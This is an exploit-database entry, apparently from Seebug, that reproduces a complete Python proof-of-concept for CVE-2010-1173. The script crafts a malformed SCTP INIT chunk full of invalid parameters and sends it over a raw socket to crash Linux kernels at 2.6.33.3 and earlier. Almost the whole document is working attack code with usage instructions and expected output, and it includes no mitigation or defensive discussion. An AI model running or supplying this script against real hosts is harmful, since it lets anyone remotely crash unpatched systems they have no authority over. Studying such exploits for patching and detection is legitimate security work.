Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS

2014-07-0100:00:00

Root

www.seebug.org

0.706 High

EPSS

Percentile

97.7%

JSON

No description provided by source.


                                                # From: http://jon.oberheide.org/files/sctp-boom.py
#!/usr/bin/env python

&#39;&#39;&#39; 
  sctp-boom.py
 
  Linux Kernel &#60;= 2.6.33.3 SCTP INIT Remote DoS
  Jon Oberheide &#60;[email protected]&#62;
  http://jon.oberheide.org
  
  Information:
 
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173

    The sctp_process_unk_param function in net/sctp/sm_make_chunk.c in the
    Linux kernel 2.6.33.3 and earlier, when SCTP is enabled, allows remote 
    attackers to cause a denial of service (system crash) via an SCTPChunkInit
    packet containing multiple invalid parameters that require a large amount 
    of error data. 

  Usage:
 
    $ python sctp-boom.py 1.2.3.4 19000
    [+] sending malformed SCTP INIT msg to 1.2.3.4:19000
    ...
    [+] kernel should have panicked on remote host 1.2.3.4

  Requirements:
    
    * dnet: http://libdnet.sourceforge.net/
    * dpkt: http://code.google.com/p/dpkt/

&#39;&#39;&#39; 

import os, sys, socket

def err(txt):
    print &#39;[-] error: %s&#39; % txt
    sys.exit(1)

def msg(txt):
    print &#39;[+] %s&#39; % txt

def usage():
    print &#62;&#62; sys.stderr, &#39;usage: %s host port&#39; % sys.argv[0]
    sys.exit(1)

try:
    import dpkt
except ImportError:
    err(&#39;requires dpkt library: http://code.google.com/p/dpkt/&#39;)

try:
    import dnet
except ImportError:
    try:
        import dumbnet as dnet
    except ImportError:
        err(&#39;requires dnet library: http://libdnet.sourceforge.net/&#39;)

def main():
    if len(sys.argv) != 3:
        usage()

    host = sys.argv[1]
    port = int(sys.argv[2])

    try:
        sock = dnet.ip()
        intf = dnet.intf()
    except OSError:
        err(&#39;requires root privileges for raw socket access&#39;)

    dst_addr = socket.gethostbyname(host)
    interface = intf.get_dst(dnet.addr(dst_addr))
    src_addr = interface[&#39;addr&#39;].ip

    msg(&#39;sending malformed SCTP INIT msg to %s:%s&#39; % (dst_addr, port))

    invalid = &#39;&#39;
    invalid += &#39;\x20\x10\x11\x73&#39;
    invalid += &#39;\x00\x00\xf4\x00&#39;
    invalid += &#39;\x00\x05&#39;
    invalid += &#39;\x00\x05&#39;
    invalid += &#39;\x20\x10\x11\x73&#39;

    for i in xrange(20):
        invalid += &#39;\xc0\xff\x00\x08\xff\xff\xff\xff&#39;

    init = dpkt.sctp.Chunk()
    init.type = dpkt.sctp.INIT
    init.data = invalid
    init.len = len(init)

    sctp = dpkt.sctp.SCTP()
    sctp.sport = 0x1173
    sctp.dport = port
    sctp.data = [ init ]

    ip = dpkt.ip.IP()
    ip.src = src_addr
    ip.dst = dnet.ip_aton(dst_addr)
    ip.p = dpkt.ip.IP_PROTO_SCTP
    ip.data = sctp
    ip.len = len(ip)

    print `ip`

    pkt = dnet.ip_checksum(str(ip))
    sock.send(pkt)

    msg(&#39;kernel should have panicked on remote host %s&#39; % (dst_addr))

if __name__ == &#39;__main__&#39;:
    main()